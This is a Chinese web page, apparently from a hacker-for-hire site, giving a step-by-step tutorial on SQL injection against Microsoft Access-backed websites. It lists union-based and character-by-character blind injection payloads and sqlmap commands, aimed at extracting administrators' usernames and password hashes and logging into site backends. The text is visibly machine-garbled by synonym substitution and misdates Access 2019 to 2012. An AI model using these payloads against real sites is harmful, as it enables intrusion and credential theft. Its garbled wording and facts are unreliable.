黑客找接单_运用SQLMap进行Access注入

作者: admin 分类: 新闻动态 发布时间: 2022-07-01 15:30

黑客找接单_运用SQLMap进行Access注入

1.1运用sqlmap进行access注入关于存在access注入的站点,能够经过手艺注入或许东西注入来获取access数据库中的表以及内容,特别是获取网站后台办理表中的用户名及其暗码。1.1.1 access数据库简介Microsoft Office Access是由微软发布的联系数据库办理体系。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特色,是Microsoft Office 的体系程序之一。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发东西结合在一起的一个数据库办理体系。它是微软OFFICE的一个成员,在包括专业版和更高版其他office版别里边被单独出售。2012年12月4日,最新的微软Office Access 2019在微软Office 2019里发布,微软Office Access 2013 是前一个版别,默然装置Office是不装置Access数据库。MS ACCESS以它自己的格局将数据存储在依据Access Jet的数据库引擎里。它还能够直接导入或许链接数据(这些数据存储在其他应用程序和数据库)。软件开发人员和数据架构师能够运用Microsoft Access开发应用软件,“高档用户”能够运用它来构建软件应用程序。和其他工作应用程序相同,ACCESS支撑Visual Basic宏言语,它是一个面向目标的编程言语,能够引证各种目标,包括DAO(数据拜访目标),ActiveX数据目标,以及许多其他的ActiveX组件。可视目标用于显现表和报表,他们的办法和特点是在VBA编程环境下,VBA代码模块能够声明和调用Windows操作体系函数。(1)ACCESS数据库结构ACCESS数据库选用表名-列名-内容数据,它不像MySQL和MSSQL,需求先创立数据库,然后创立表,输入内容到表中。ACCESS的数据库是一个mdb文件(例如data.mdb),一个库能够包括若干张表。(2)操作ACCESS数据库默许是在装置Office时挑选装置Access组件来创立数据库,对数据库中的表施行办理操作。也能够经过一些Access数据库拜访东西进行操作。1.1.2Access注入根底1. access注入根本流程(1)判别有无注入(2)猜解表名(3)猜解字段(4)猜解办理员字段值(5)猜解用户名和暗码长度(6)猜解用户名和暗码(7)破解加密暗码(8)寻觅并登录后台2.常见的注入东西常见的SQL注入东西有“HDSI 3.0 Goldsun洁净拓展版”、“Domain”、“Safe3”、“啊D东西”、“井蛙之见”、Havij、pangolin、WebCruiser和SQLmap等。现在只是SQLmap是开源,出于安全考虑,主张用sqlmap东西进行access注入。3.常见的查询方法(1)联合查询法(速度快,兼容性欠好)and 1=1 and 1=2 ——判别注入order by 22  ——猜有多少列(12正确,13过错,则为12个)union select 1,2,3,4,5,6,7,8,9,10,11,12from admin ——猜表名(报错阐明表名不存在,将admin表换成其他持续猜想)union select 1,2,username,4,5,6,7,8,9,10,11,12from admin ——猜列名(列名方位放置页面上显现的数字方位上,报错阐明列名不存在,换列明持续猜,列名猜对后及出账号暗码)(2)逐字猜解法(速度慢,兼容性好)and 1=1 and 1=2 ——判别注入and exists (select * from admin) ——猜表名and exists (select user_name from admin) ——猜列名查数据:1.确认长度 2.确认asc数据(asc编码)and (select top 1 len(user_name ) fromadmin)=5(user_name 的长度=5,正常则=5,也能够用>,and (select top 1 asc(mid(user_name ,1,1))from admin)=97 判别第一位(97代表‘a’的ascll值)and (select top 1 asc(mid(user_name ,2,1))from admin)=97 判别第二位(user_name =admin 第一位a 第二位d 第三位m 第四位i 第五位npass_word=a48e190fafc257d3)4. 判别有无注入(1)大略型:提交单引号’,id值-1、id值+1,判别页面显现信息不同或许犯错信息。(2)逻辑型(数字型注入):and1=1 、and 1=2;正常显现,内容与正常页面显现的成果根本相同;提示BOF或EOF(程序没做任何判别时),或提示找不到记载,或显现内容为空(程序加了on error resume next);在数据库中是否履行,and 1=1 永远为真所以页面回来正常,and 1=2永远为假所以回来的成果会犯错,依据其成果来判别是否存在sql注入。(3)逻辑型(字符型注入):’and ’1′=’1/’ 、and ’1′=’2(4)逻辑型(搜索型注入):百分之’and 1=1 、and ‘百分之’='百分之/百分之’ 、and 1=2 and ‘百分之’='百分之1.1.3SQLmap思路及指令1. SQLmapaccess注入操作思路(1)手艺判别url是否存在SQL注入。经过在url传入参数处参加“’”、and 1=1、and 1=2等,检查页面是否犯错,假如存在页面不相同或许有犯错信息,则标明网站url存在sql注入。常见的过错信息如下:Microsoft JET Database Engine 过错 ’80040e14′在联合查询中所选定的两个数据表或查询中的列数不匹配。/view.asp,行 26以上信息标明数据库选用Access数据库。(2)运用sqlmap进行检测注入点是否可用Sqlmap指令:sqlmap.py –uurl  假如存在,则会提示进行相应操作,例如判别数据库中的表,假如不存在则无法持续。(3)检测表,履行“sqlmap.py–u url –tables”指令来获取access数据库表,需求挑选线程数,主张挑选1-20之间,这个数过大,会导致网站无法翻开。

[1] [2] [3]  黑客接单网

更多阅读